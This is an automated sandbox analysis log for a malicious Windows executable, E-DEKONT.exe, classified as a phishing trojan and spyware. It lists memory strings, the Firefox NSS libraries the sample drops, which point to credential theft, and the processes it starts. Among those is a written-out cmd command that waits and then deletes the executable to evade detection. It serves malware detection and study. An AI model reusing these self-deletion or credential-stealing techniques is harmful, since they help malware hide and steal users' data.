Source: E-DEKONT.exe, 00000004.00000003.108889973154.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108913399205.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108938541582.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108889185436.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108940858034.000000001E734000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108902878047.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108895399238.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000002.109036371448.000000001E380000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108908941995.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108886923210.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108892004613.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108944495518.000000001E78C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108939672315.000000001E714000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108891891978.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108904933284.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108884231351.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108912726161.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108945279969.000000001E7C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108945375034.000000001E7C4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108885630583.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108919075540.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108898625241.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108917692756.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108896445391.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108944687963.000000001E79C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108904797866.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108911467372.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108939584393.000000001E710000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108919898776.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108899797081.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
Source: E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
Source: C:\Users\user\Desktop\E-DEKONT.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Section loaded: crtdll.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: edgegdi.dll Jump to behavior
Source: E-DEKONT.exe Virustotal: Detection: 26%
Source: E-DEKONT.exe ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\E-DEKONT.exe File read: C:\Users\user\Desktop\E-DEKONT.exe Jump to behavior
Source: E-DEKONT.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\E-DEKONT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\E-DEKONT.exe C:\Users\user\Desktop\E-DEKONT.exe
Source: C:\Users\user\Desktop\E-DEKONT.exe Process created: C:\Users\user\Desktop\E-DEKONT.exe C:\Users\user\Desktop\E-DEKONT.exe
Source: C:\Users\user\Desktop\E-DEKONT.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\E-DEKONT.exe Process created: C:\Users\user\Desktop\E-DEKONT.exe C:\Users\user\Desktop\E-DEKONT.exe Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403373
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\nsq7CBC.tmp Jump to behavior
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@8/55@2/2
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_004020FE CoCreateInstance, 1_2_004020FE
Source: C:\Users\user\Desktop\E-DEKONT.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_004046E6
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s;
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
